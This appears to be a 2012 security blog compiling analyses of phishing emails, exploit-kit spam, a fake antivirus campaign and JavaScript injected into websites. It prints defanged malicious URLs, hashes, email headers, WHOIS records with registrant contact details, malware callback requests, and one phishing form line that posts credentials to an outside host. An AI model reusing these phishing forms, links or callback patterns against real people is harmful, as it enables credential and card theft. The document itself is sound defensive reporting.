Phishing: Attention ! Votre compte PayPal a ete limite

New phishing email used to spread HTML files with fake PayPal login forms:

Phishing Email

Header details:

Received: from ns3.komvos.gr (ns3.komvos.gr [88.198.65.153])
Received: by ns3.komvos.gr (Postfix, from userid 48)
Subject: Attention ! Votre compte PayPal a été limité !
From: Service Paypal
Date: Mon,  4 Jun 2012 13:00:12 +0300 (EEST)
Content-Disposition: attachment; filename="Informations Compte Paypal .zip"

There is a ZIP file attached:

File: Informations Compte Paypal .zip
Dimensione: 5391 bytes
MD5: 2C573252C917A4E4FFC2138E48B50F2B
SHA1: 28B36A51D9215F143AC449984A27A74D520679B7
SHA256: 5E45F7E1988AE2F1B8721226D88AB7DD9EB8A395FB4C501E145554F49655C8C9
SHA384: EE4D4201B65716A986162D43F289FA695263B9BC3EB839F08F185F2B1A1DEC777C68439D91C068DAA80768712B53D80E
SHA512: BA111FCB751F40837E58F50F76314380E8D52FD97B5E98F7855D813433C8FFCDDD26AF58DEE7894F4BC4D2AF53760268FBE25C650FCDC55B0796F6D316E5147A

The extracted file is a .HTML file:

File: Informations Compte Paypal .html
Dimensione: 22525 bytes
MD5: 0500506DEDA37FBC1A7CD19C22173764
SHA1: AB7F78D2A70460418E858E4783F5D3F5376CF2E2
SHA256: F81D8AAA2996D7FB13320FD6F05C37AA1A1CD7BA7BCD29823B03731ED3A067E2
SHA384: 7EEA087DEEEE72203E81F7F606CDAD90F4F5EB1233A95DC692556AFE6AA5B94426E7B84881101F21BF84730B0E132EE3
SHA512: 0B858A75C10EBDBFC9A6D7CDE4C1AB34199B67A51999AB59E85086182C93EF66C20956BA62E68647C27B91704D5A2D4E2EA68749C77ED39DF4AB1F679245BE18

From this HTML code:

<form action="hxxp:// byrongoldworks .com /mainbody.php" method="post" name="zaz" onsubmit="return verif_formulaire()">

We can see that the sensitive data of the form is sent to:

hxxp:// byrongoldworks .com /mainbody.php

Report from URLVoid:

URLVoid Report for byrongoldworks .com

Spam “Your Bill Me Later notice” leads to Incognito exploit kit

Users have reported another malicious email message with subject “Your Bill Me Later notice” that states you have made a payment over the phone of $60.12 to Bill Me Later website. The email body is full of HREF links that point to a lot of malicious URLs, view a screenshot of the email message:

Your Bill Me Later notice

Email header details:

Received: from server.serverhk.net (69-164-193-60.magicnic.com [69.164.193.60])
Received: from [200.76.191.2] (helo=askokay.com) by server.serverhk.net with esmtpsa
Received: from [192.245.26.33] by m1.gns.snv.thisdomainl.com with SMTP; Wed, 16 May 2012 21:04:47 +1000
Received: from [68.117.211.36] by mailout.endmonthnow.com with NNFMP; Wed, 16 May 2012 20:54:02 +1000
Date: Wed, 16 May 2012 20:50:24 +1000
From: "Advera" askokay@askokay.com
Subject: Your Bill Me Later notice

The malicious extracted URLs are:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
hxxp:// www. studiobarsotti .it /3oXGcu61/index.html
hxxp:// www. eventosabsolue .com /qh8xhoi8/index.html
hxxp:// foxpublicidade .com .br /foRzthoD/index.html
hxxp:// www. studiobarsotti .it /GRYYEt3L/index.html
hxxp:// 76.12.158 .176 /3oXGcu61/index.html
hxxp:// 76.12.158 .176 /yWyXU9NU/index.html
hxxp:// www. eventosabsolue .com /ZmUaukzG/index.html
hxxp:// ewaleczek. cal24 .pl /5CY4dSwa/index.html
hxxp:// www. eventosabsolue .com /h03NraKE/index.html
hxxp:// foxpublicidade. com .br/yWyXU9NU/index.html
hxxp:// www. hso. co. jp/yWyXU9NU/index.html
hxxp:// zajacpiotr. hostit .pl /yWyXU9NU/index.html
hxxp:// zajacpiotr. hostit. pl /smWHegmd/index.html
hxxp:// ftp.joblines .sk /ri8ZKUip/index.html
hxxp:// www. sacmilani. com. ar /uvoNJPhk/index.html
hxxp:// foxpublicidade. com. br /smWHegmd/index.html
hxxp:// www. studiobarsotti .it /hTVbWtV1/index.html
hxxp:// jahu. com. br /FW3s2g0r/index.html
hxxp:// onecursos .com .br /foRzthoD/index.html
hxxp:// www. studiobarsotti .it /GRYYEt3L/index.html
hxxp:// www. studiobarsotti .it /yWyXU9NU/index.html
hxxp:// www. kayafamily .it /ZmUaukzG/index.html

Using URL Dump we can dump the HTML content:

Dumped HTML Content

From the dumped data, we can see it is the Incognito exploit kit.

Extacted malicious URLs:

hxxp:// bigdeal . my/ZyYJZ7F0/js.js

The malicious URLs redirect users to another malicious URL:

hxxp:// 69.163.34. 134 /showthread.php?t=977334ca118fcb8c

If we use URL Dump and we set the user-agent to Java, when we dump the content of the new malicious URL we can see it recognises from the user-agent that the user is using Java and the exploit tries to serve the infected Java applet:

Dumped Data

More Malicious Links Spammed to Twitter Users

Another malicious link received by an user via Twitter:

hxxp:// profitscoaching .info /index.php?eVTv=1336686044437

Whois details:

Domain Name: profitscoaching .info
Registrar: GoDaddy.com LLC (R171-LRMS)
Status: CLIENT DELETE PROHIBITED, CLIENT RENEW PROHIBITED, CLIENT TRANSFER PROHIBITED, CLIENT UPDATE PROHIBITED
Expiration Date: 2013-03-07 14:59:08
Creation Date: 2012-03-07 14:59:08
Last Update Date: 2012-05-06 20:39:46
Name Servers:
ns61.domaincontrol.com
ns62.domaincontrol.com
 
Registrant Contact Information:
Name: Registration Private
Organization: Domains By Proxy, LLC
Address 1: DomainsByProxy.com
Address 2: 15111 N. Hayden Rd., Ste 160, PMB 353
City: Scottsdale
State: Arizona
Zip: 85260
Country: US
Phone: +1.4806242599
Fax: +1.4806242598

Hosting details:

The website profitscoaching .info is hosted at WholeSale Internet and its current IP address is 173.208.196.245 (-). The server machine is located in United States (US) and in the same server there are hosted other 0 websites. The domain is registered with the suffix INFO and the keyword of the domain is profitscoaching. The organization is Gold VIP Club.

The malicious link redirects users to another malicious link:

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.6.32
Date: Fri, 11 May 2012 22:55:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny16
Set-Cookie: PHPSESSID=1bff1c2b505aa2004bda6028bb28ad0a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: hxxp:// aooale .info /ytb/redirect.php

Extracted malicious link:

hxxp:// aooale .info /ytb/redirect.php

Whois details:

Domain Name: aooale .info
Registrar: GoDaddy.com LLC (R171-LRMS)
Status: CLIENT DELETE PROHIBITED, CLIENT RENEW PROHIBITED, CLIENT TRANSFER PROHIBITED, CLIENT UPDATE PROHIBITED
Expiration Date: 2012-09-21 13:41:55
Creation Date: 2011-09-21 13:41:55
Last Update Date: 2011-11-20 20:41:26
Name Servers:
ns49.domaincontrol.com
ns50.domaincontrol.com
 
Registrant Contact Information:
Name: Registration Private
Organization: Domains By Proxy, LLC
Address 1: DomainsByProxy.com
Address 2: 15111 N. Hayden Rd., Ste 160, PMB 353
City: Scottsdale
State: Arizona
Zip: 85260
Country: US
Phone: +1.4806242599
Fax: +1.4806242598

Hosting details:

The website aooale.info is hosted at DirectSpace Networks, LLC. and its current IP address is 174.140.169.101 (-). The server machine is located in United States (US) and in the same server there are hosted other 0 websites. The domain is registered with the suffix INFO and the keyword of the domain is aooale. The organization is DirectSpace Networks, LLC.

URLVoid scan reports:

http://urlvoid.com/scan/aooale .info
http://urlvoid.com/scan/profitscoaching .info

Other malicious links:

hxxp:// ioi8 .info /gps
hxxp:// bp9 .info /mobi/redirect.php
hxxp:// iso8 .info /lg
hxxp:// jay8 .info /b2d
hxxp:// saov .info /mobilemoneymachines/

The malicious links where users are generally being redirected seem scam pages:

Fake Make Money Sites

The scam pages show fake images of people that take in hand a check and promote the “Work at home mum makes

Spam link on Twitter leads to Fake Antivirus Rogue Software

One user has reported us a malicious URL that is being sent as a private message to the users that are registered on Twitter, the extracted malicious link is:

hxxp:// www. delicious-audio .com /wp-content

If clicked, it redirects users to a new malicious link:

HTTP/1.1 302 Found
Date: Tue, 08 May 2012 20:50:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Location: hxxp:// blog.keeples .com /wp-content
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 27
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Extracted malicious link:

hxxp:// blog.keeples .com /wp-content

Now there is a new redirect to another malicious link:

HTTP/1.1 302 Found
Date: Tue, 08 May 2012 20:50:13 GMT
Server: Apache/2.2.3 (CentOS)
Location: hxxp:// spywarecleanermicrosoft .info /0520091375cbc551/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Extracted malicious link:

hxxp:// spywarecleanermicrosoft .info /0520091375cbc551/

This is the link of the web page of the fake antivirus rogue software.

Whois details:

Domain Name: spywarecleanermicrosoft.info
Registrar: eNom, Inc. (R126-LRMS)
Status: CLIENT TRANSFER PROHIBITED, TRANSFER PROHIBITED, ADDPERIOD
Expiration Date: 2013-05-08 11:32:40
Creation Date: 2012-05-08 11:32:40
Last Update Date: 2012-05-08 11:33:15
 
Name Servers:
ns1.dnsexit.com
ns2.dnsexit.com
ns3.dnsexit.com
ns4.dnsexit.com
 
Registrant Contact Information:
Name: Gerolamo Genovese
Address 1: Via Bernardino Rota 1
City: Mellana
State: CN
Zip: 12012
Country: IT
Phone: +39.3535605212
Email: kinsman@doramail.com

Hosting details:

The website spywarecleanermicrosoft .info is hosted at BurstNET Limited and its current IP address is 31.193.12.3 (31-193-12-3.static.hostnoc.net). The server machine is located in United Kingdom (GB) and in the same server there are hosted other 0 websites. The domain is registered with the suffix INFO and the keyword of the domain is spywarecleanermicrosoft. The organization is BurstNET Limited.

Screenshot of the fake warning message:

Fake Warning Message

Screenshot of the fake scanning web page:

Fake Scanning Page

From the above images we can see that it is distributed the fake rogue security software named Windows Antivirus 2012. After the fake system scanning is finished, the user is prompted to downloaded an executable file named setup.exe:

Downloaded File

The file is downloaded from a new malicious website:

GET /0520091375cbc551/setup.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: hxxp:// spywarecleanermicrosoft .info /0520091375cbc551/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: scannerdatamicrosoft .info

Whois Details:

Domain Name: scannerdatamicrosoft .info
Registrar: eNom, Inc. (R126-LRMS)
Status: CLIENT TRANSFER PROHIBITED, TRANSFER PROHIBITED, ADDPERIOD
Expiration Date: 2013-05-08 11:11:28
Creation Date: 2012-05-08 11:11:28
Last Update Date: 2012-05-08 11:12:08
 
Name Servers:
ns1.dnsexit.com
ns2.dnsexit.com
ns3.dnsexit.com
ns4.dnsexit.com
 
Registrant Contact Information:
Name: Dionisia Barese
Address 1: Corso Porta Borsari 78
City: San Martino Di Castrozza
State: TN
Zip: 38058
Country: IT
Phone: +39.3171462400
Email: milner@snail-mail.net

Domains Details:

The website scannerdatamicrosoft .info is hosted at SPLIUS, UAB and its current IP address is 77.79.10.13 (hst-10-13.duomenucentras.lt). The server machine is located in Lithuania (LT) and in the same server there are hosted other 0 websites. The domain is registered with the suffix INFO and the keyword of the domain is scannerdatamicrosoft. The organization is Webhosting, collocation services.

File details:

File: setup.exe
Size: 2278400 bytes
MD5: EC91E0F31587F6471A4EBCFE2681A45B
SHA1: 0AB7F7253F5CBADF6D664781A73D30A19E251FCA
SHA256: 67DFD917561DF7FE653CE5E0CD7E0688E42B719F1BB475A5EE2819003CE6DC6A
SHA384: 77BB9D7DF670BC9F4C91DED341086C30570E6D9AE14BEE1A172F502CA5C502428FC631B9F88A31CECF290B7CFB1C5FA2
SHA512: 85D1F0608D24DD2B15477EAC540666319831F829B7E8065D9E5B8A2AC5D4860486BCA891FA95DBBBB8EB93834485575108EE957C5AD556EFBA9FDA5824D2C780

When executed the file setup.exe, the rogue software drops two .EXE files:

Dropped .EXE files

File Modified - %SAMPLE% - %AppData%\Protector-phkm.exe
Process Created - %SAMPLE% - %AppData%\Protector-phkm.exe - Unknown Publisher - EC91E0F31587F6471A4EBCFE2681A45B - 2278400 bytes
File Created - %SAMPLE% - %AppData%\Protector-phkm.exe - EC91E0F31587F6471A4EBCFE2681A45B - 2278400 bytes - attr: [] - PE
Process Created - %SAMPLE% - C:\WINDOWS\system32\cmd.exe - Microsoft Corporation - 6D778E0F95447E6546553EEEA709D03C - 389120 bytes
File Deleted - C:\WINDOWS\system32\cmd.exe - %SAMPLE% - 2278400 bytes
File Modified - %SAMPLE% - %AppData%\Protector-tpqx.exe
Process Created - %SAMPLE% - %AppData%\Protector-tpqx.exe - Unknown Publisher - EC91E0F31587F6471A4EBCFE2681A45B - 2278400 bytes
File Created - %SAMPLE% - %AppData%\Protector-tpqx.exe - EC91E0F31587F6471A4EBCFE2681A45B - 2278400 bytes - attr: [] - PE

And this is the screenshot of the splash screen of the rogue software:

windows-prosecurity-scanner-fake-antivirus

More screenshots of the rogue software:

GUI

When the user click on “Activate” button, the rogue software executable opens a new Internet Explorer web page where user is supposed to insert his/her credit card details (that will be stolen by the trojan), here is the screenshot of the malicious web page:

Fraud Page

Connections logged:

GET / HTTP/1.0
Accept: application/x-shockwave-flash, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www. cmyip .com
Connection: Keep-Alive
 
GET /service/ HTTP/1.0
User-Agent: Mozilla/4.0
Host: 0520091375cbc551 .on-linepaysafery .info
 
POST / HTTP/1.0
Accept: application/x-shockwave-flash, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 0520091375cbc551. on-linepaysafery .info
Content-Length: 109
Connection: Keep-Alive
Pragma: no-cache
Cookie: ct=2011:3:27:23:23; ch=f58320d2a7c79b1a48b7c70a7d2d280a
action=form&projectId=72&partnerId=146&subId=0&install_id=yhstmcvcgj&group_name=2011-3-28_1&reason=errorflash
 
GET /payment_forms/default/images/sprite.png HTTP/1.0
Accept: */*
Referer: hxxp://0520091375cbc551 .on-linepaysafery .info /
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 0520091375cbc551 .on-linepaysafery .info
Connection: Keep-Alive
Cookie: ct=2011:3:27:23:23; ch=f58320d2a7c79b1a48b7c70a7d2d280a

Malicious links extracted:

hxxp:// 0520091375cbc551. on-linepaysafery .info /service/

Whois Details:

Domain Name: on-linepaysafery .info
Registrar: eNom, Inc. (R126-LRMS)
Status: CLIENT TRANSFER PROHIBITED, TRANSFER PROHIBITED, ADDPERIOD
Expiration Date: 2013-05-08 08:24:44
Creation Date: 2012-05-08 08:24:44
Last Update Date: 2012-05-08 08:26:02
 
Name Servers:
ns1.dnsexit.com
ns2.dnsexit.com
ns3.dnsexit.com
ns4.dnsexit.com
 
Registrant Contact Information:
Name: Dionisia Barese
Address 1: Corso Porta Borsari 78
City: San Martino Di Castrozza
State: TN
Zip: 38058
Country: IT
Phone: +39.3171462400
Email: sini@wildmail.com

Domain details:

The website www.on-linepaysafery .info is hosted at SPLIUS, UAB and its current IP address is 77.79.10.15 (hst-10-15.duomenucentras.lt). The server machine is located in Lithuania (LT) and in the same server there are hosted other 2 websites. The domain is registered with the suffix INFO and the keyword of the domain is on-linepaysafery. The organization is Webhosting, collocation services.

URLVoid scan reports:

http://www.urlvoid.com/scan/delicious-audio .com
http://www.urlvoid.com/scan/spywarecleanermicrosoft .info
http://www.urlvoid.com/scan/0520091375cbc551. on-linepaysafery .info
http://www.urlvoid.com/scan/on-linepaysafery .info
http://www.urlvoid.com/scan/blog.keeples .com
http://www.urlvoid.com/scan/scannerdatamicrosoft .info

Link LinkedIn Mail leads to Incognito exploit kit

We have logged a new email that looks like to be sent by LinedIn:

Scam Email

The email header info shows it is a scam:

Received: from lhost10.forahost.net (server-178.211.48.24.as42926.net [178.211.48.24])
Received: from c9069568.static.spo.virtua.com.br ([201.6.149.104]:49583 helo=fixnot.com.tr) by lhost10.forahost.net
Date: Fri, 04 May 2012 08:34:11 -0700
From: "Order" @fixnot.com.tr
Subject: Link LinkedIn Mail

The email body contains also few malicious links:

hxxp:// gopeshmathur .com/ZgUBqavg/index.html

The dumped content of the URL is clear a Incognito exploit kit:

Incognito exploit kit URLs

All the new malicious links are still alive and they redirect users to:

Incognito exploit kit

The Java exploit JAR files are downloaded from:

hxxp:// 50.116.8. 93 /data/Pol.jar
hxxp:// 69.163.34 .114 /data/Pol.jar
File: Pol.jar
Size: 15404 bytes
MD5: 020B0B477706596E71DE25286ED77991
SHA1: C196A7B07BFE3D3593E93F7D98E910FA8E63AFF6
SHA256: F76AC6983135C7A69B5F07BC762F1AA478E2D49489090AC66882BC8065D1862B
SHA384: 9C6BF2971E1F86588A9A08A3F18C096FBC62A42CE6927E0A7D0AFDB56DA01DBC4A6F72F742CC62B510FC1085221753D5
SHA512: 5464424E028620C4821B740B89787C7A75E6A56401F98BD15BA94F1A9268D54411E41E97DAE86468F4BDA54160A023DCC45F134E97BC6655E31C9274F8A21FC0

The JAR file exploits the vulnerability in the Java Runtime Environment component of Oracle Java SE (CVE-2012-0507), more details from the oracle.com website:

Vulnerability in the Java Runtime Environment component of Oracle Java SE (subcomponent: Concurrency). Supported versions that are affected are 7 Update 2 and before, 6 Update 30 and before and 5.0 Update 33 and before. Easily exploitable vulnerability allows successful unauthenticated network attacks via multiple protocols. Successful attack of this vulnerability can result in unauthorized update, insert or delete access to some Java Runtime Environment accessible data as well as read access to a subset of Java Runtime Environment accessible data and ability to cause a partial denial of service (partial DOS) of Java Runtime Environment.

Other malicious Incognito exploit kit URLs:

hxxp:// ftp.coden .com .br /BhxC8VrP/index.html
hxxp:// generalcontractorsnc .com/nUUyHyvy/index.html
hxxp:// mccgedvalenca .com .br/JFs10e34/index.html
hxxp:// radiooisvira .com /mRpNLgWY/index.html
hxxp:// statisticsolympiad .org /gR2aietM/index.html

URLVoid scan reports:

http://www.urlvoid.com/scan/gopeshmathur .com
http://www.urlvoid.com/scan/jombangit .com
http://www.urlvoid.com/scan/shahinvestment .com
http://www.urlvoid.com/scan/mazyamana .com
http://www.ipvoid.com/scan/72.5.102.224
http://www.urlvoid.com/scan/ftp.coden .com .br
http://www.urlvoid.com/scan/generalcontractorsnc .com
http://www.urlvoid.com/scan/mccgedvalenca .com .br
http://www.urlvoid.com/scan/statisticsolympiad .org
http://www.urlvoid.com/scan/radiooisvira .com

Com.Br Websites Infected with Maliciour JS Code (count18.php)

Our sandbox has logged various domains with suffix .COM.BR infected with a malicious obfuscated javascript code, that is injected at begin of the HTML pages of the websites, before the initial <html> tag:

Obfuscated JS code

The malicious script redirects the users to a malicious URL:

hxxp:// bylviha .ru/count18.php

An example of websites infected:

hxxp:// carboniferacatarinense .com .br/
hxxp:// www. csir-iir. org/
hxxp:// www. terapets .com/

Sometimes the malicious script is injected inside the <title> tag:

JS Injected in Title TAG

URLVoid reports of malicious domains:

http://www.urlvoid.com/scan/bylviha .ru
http://www.urlvoid.com/scan/carboniferacatarinense .com .br
http://www.urlvoid.com/scan/csir-iir. org
http://www.urlvoid.com/scan/terapets .com

Phishing: A causa del nostro recente aggiornamento. Verified by Visa

We have logged other phishing emails used to steal details of Visa users:

From - Mon Apr 23 16:04:50 2012
Received: from ser.just3d.tv (unknown [91.227.127.33])
Received: (qmail 23589 invoked by uid 0); 23 Apr 2012 13:21:36 -0000
Received: from unknown (HELO User) (admin@just3d.tv@151.58.16.184)
Reply-To: sicurela@visaltalia.it
From: "verified by visa" verified@visaitalia.com
Subject: A causa del nostro recente aggiornamento.
Date: Mon, 23 Apr 2012 15.21.34 +0200
To: undisclosed-recipients:;

Note from the email header the source of the message:

Received: from ser.just3d.tv (unknown [91.227.127.33])

It has nothing to do with Visa, and note also the emails:

Reply-To: sicurela@visaltalia.it

See the visaltalia.it is a l and not an i.

The message of the email:

Gentile Cliente, 
A causa del nostro recente aggiornamento sui nostri server 
(23/04/2012) e necessario aggiornare il tuo profilo. 
Per una maggiore sicurezza e di accesso, si prega di compilare il 
modulo allegato. 
 
Vi ringraziamo della vostra collaborazione. 
 
Copyright Visa Europe 2012. Tutti i diritti riservati

There is also an attached file named visaitalia.html:

File: visaitalia.html
Size: 20015 bytes
MD5: 2C76E9F667E78C8C32C09DBE1129969E
SHA1: 0A30FFC20AC311AF2831086D4B181E0F23483399
SHA256: 1757C6A066E61F1B3E9782570712641FC734E1C6ACCD1DA329F3B10B164136CC
SHA384: BD80E5B8A83A3C00D72B6367421AE85CC6A1FF8981F43D0D6784B52D0AAE58B22DD74293BD8735C8B0E4331C8CCCDA02
SHA512: 4B82AC139180E6B19C58A553456BBE30CE155E22A695E300115CAC5C8BDB3F84A024CCDF104E280162B0C44AF1495C850CA3565533DE62EC6F14EF7754295A30

The attached file contains the form used to send the typed details to a remote link. Listed below there are few malicious links extracted from the HTML attached file:

hxxp:// leonidasvancouver .com /admin/plm/plm.html
hxxp:// rottenfish .de /vbv/plm_files/Logo-Mastercard_Secure_Code.gif
hxxp:// rottenfish .de /vbv/plm_files/fin_VerifiedByVisa_186x79.gif
hxxp:// rottenfish .de /vbv/run.php

The malicious websites are classified as detected in URLVoid:

http://www.urlvoid.com/scan/rottenfish .de/
http://www.urlvoid.com/scan/leonidasvancouver .com/

Express LinkedIn Mail: spread Blackhole Exploit Kit URLs

We have received few emails that looked like to be sent from LinkedIn:

Email

But after checking email header details it was clearly a spam:

Return-Path: trtro@www.trt.ro
Received: from vps136.whmpanels.com (unknown [89.42.219.181])
Received: from [95.6.42.101] (helo=www.trt.ro) by vps136.whmpanels.com
Date: Fri, 30 Mar 2012 21:37:47 +0100
From: "Support" trtro@www.trt.ro
Subject: Express LinkedIn Mail

The A HREF links redirect to 3 different malicious URLs:

hxxp:// groupehydrogaz .com/20sZhJqa/index.html
hxxp:// dealerpos .com/uFj7A93z/index.html
hxxp:// hobbyconcept666.yellis .net/20sZhJqa/index.html

URLVoid reports:

http://www.urlvoid.com/scan/groupehydrogaz.com/
http://www.urlvoid.com/scan/dealerpos.com/
http://www.urlvoid.com/scan/hobbyconcept666.yellis.net/

The page content dumped from one of these malicious URLs looks like:

Dumped Content

That content looks like the spread-style of Blackhole Exploit Kit.

Other malicious URLs are:

hxxp:// ftp.planitur .com.br/dyEmcL4N/js.js
hxxp:// quiztown .org/U2iBLpvu/js.js
hxxp:// wap .tl/8M6kMfpV/js.js
hxxp:// laspeziacaritas .it/1M4VoeVe/js.js

URLVoid reports:

http://www.urlvoid.com/scan/ftp.planitur.com.br/
http://www.urlvoid.com/scan/quiztown.org/
http://www.urlvoid.com/scan/wap.tl/
http://www.urlvoid.com/scan/laspeziacaritas.it/

Pay always attention when opening known and unknown emails:

1) Always analyze email headers to see who sent the email
2) Scan links with our service http://www.urlvoid.com/
3) Do not download unknown files
4) Avoid to open emails that have subject related to pharmaceutical products
5) Avoid to open emails that have subject related to sexual content
6) When emails are from your Bank, always call your Bank before open the email